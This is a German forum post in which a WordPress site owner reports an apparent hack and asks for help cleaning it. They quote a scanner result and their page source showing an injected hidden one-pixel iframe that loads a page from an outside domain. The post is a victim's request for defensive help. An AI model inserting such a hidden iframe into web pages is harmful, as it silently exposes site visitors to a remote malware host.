Liebe Experten, heute entdeckte ich, dass meine Seiten http://www.webgewandt.de wohl gehackt wurden.
Mit sitecheck.sucuri.net/scanner/ habe ich das gecheckt- er schlug positiv auf Malware an (die nicht blacklisted ist, kein Wunder denn zu dem genannten Eindringling fand ich bislang kein Posting irgendwo):
Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src=http://www.negrilab.it/old/stata.html WIDTH=1 HEIGHT=1 frameborder=0>
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
<iframe src=http://www.negrilab.it/old/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME><!DOCTYPE html>
In meinem Quellcode sieht das so aus:
<head></head>
<body class="home page page-id-2 page-template page-template-default logged-in">
<iframe width="1" height="1" frameborder="0" src="http://www.negrilab.it/old/stata.html">
<meta charset="UTF-8">
D.h. der Header wurde komplett ersetzt und vermutlich wird mein Inhalt durch den iFrame des A*ochs negrilab.it gekapert. Wie das genau funktioniert weiß ich leider nicht. Wer kann mir helfen, das Problem zu lösen? Leider hab ich kein (aktuelles) Backup (hinterher ist man immer schlauer), weshalb ich dankbar wäre für eine 'Pflückraus-Lösung' ohne alles neu aufzusetzen. In die PHPs hab ich noch nicht im Einzelnen geschaut, weil ich erst einmal Feedback erhoffe.
System-Voraussetzungen:
WP 3.0.1.
Die ht.access wurde nicht bösartig verändert.
In der wp-config.php hatte ich die $table_prefix aus Sicherheitsgründen geändert.
Der Benutzername ist ein anderer als der öff. gezeigte Spitzname.
Niemand anderes darf bei mir schreiben.
Die Kommentarfunktion ist moderiert und wurde bislang nur für einzelne Seiten freigegeben.
Meine letzte Aktionen war die Installation des Plugin Orderli am 27.1.
und die Einbindung eines RSS Feeds im Blogroll.
Ich bin dankbar für Erläuterungen, ob das eine Script Injection ist, oder was- ich hab mich schon etwas umgesehen, benötige aber noch mehr Input für ein gezieltes Vorgehen.
Herzlichen Dank!